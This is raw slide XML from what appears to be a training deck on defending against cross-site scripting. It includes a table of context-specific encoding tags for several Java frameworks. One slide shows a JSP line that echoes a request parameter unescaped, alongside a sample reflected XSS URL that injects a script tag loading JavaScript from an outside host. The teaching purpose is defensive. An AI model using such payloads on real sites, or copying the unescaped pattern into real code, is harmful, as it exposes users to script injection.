                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>URL</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;s:url  /&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;spring:url value="/url/path/{params}"&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;h:outputLink&gt; with &lt;f:param&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="sk-SK" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>automatically encoded</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="760640">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>JS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;s:property escapeJavaScript/&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;spring:escapeBody javaScriptEscape="true"&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="is-IS" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>   </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;c:out&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>automatically encoded</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="330713">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>CSS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="sk-SK" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="sk-SK" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="sk-SK" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="sk-SK" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="sk-SK" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10005"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="760640">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>XML</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;s:property escapeXml/&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="bg-BG" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>automatically encoded</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="mr-IN" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;c:out&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="t"/>
                      <a:r>
                        <a:rPr lang="sk-SK" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10006"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{393A95B9-B41D-3149-8B79-EDF5DABA0644}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="457200"/>
            <a:ext cx="8229600" cy="910694"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>XSS Defense by Context and Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="919058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HTML Body Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="202947002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XSS in HTML Body</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="1726830"/>
            <a:ext cx="8686800" cy="715581"/>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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1) Here is a URL that an attacker could manipulate:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="560070" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1"/>
              <a:t>error_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>=You cannot access that file</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="2620459"/>
            <a:ext cx="8686800" cy="715581"/>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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2) The error message variable is displayed in a web page like so:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="560070" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;div&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>&lt;%= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1"/>
              <a:t>error_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>") %&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457201" y="3502328"/>
            <a:ext cx="8686800" cy="715581"/>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tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3) Here is a sample basic attack:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="560070" indent="-285750">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" err="1"/>
              <a:t>error_msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>=&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>e.kp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" err="1"/>
              <a:t>e.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="4809120"/>
            <a:ext cx="8229599" cy="584776"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML Encoding stops XSS in this context!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6970003" y="547416"/>
            <a:ext cx="1716797" cy="1465129"/>
            <a:chOff x="6714321" y="635329"/>
            <a:chExt cx="1716797" cy="1465129"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="22" name="Group 21"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
